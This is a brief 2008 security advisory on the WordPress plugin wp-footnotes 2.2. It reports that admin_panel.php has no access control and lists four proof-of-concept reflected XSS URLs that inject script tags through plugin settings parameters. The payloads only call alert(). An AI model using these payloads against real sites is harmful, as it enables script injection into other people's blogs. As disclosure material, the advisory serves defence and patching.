################################################################
Wordpress Plugin wp-footnotes 2.2  admin_panel.php Multiple Vulnerabilities
Founded: 1st, February 2008 Founder: NBBN
################################################################

1) No Access Control.

An attacker can access the adminpanel of the footnotes.

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.ph
p

The result -> Many XSS Vulnerabilities. because no defines of variables. And 
he can add his own code on the blog footer.

2) Multiple XSS Vuln's  (Register Globals: ON)

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.ph
p?wp_footnotes_current_settings[priority]="><script>alert("XSS")</script
>

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.ph
p?wp_footnotes_current_settings[style_rules]=</textarea><script>alert("X
SS")</script>

http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnote
s_current_settings[pre_footnotes]=</textarea><script>alert("XSS")</scrip
t>

http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnote
s_current_settings[post_footnotes]=</textarea><script>alert(":-(")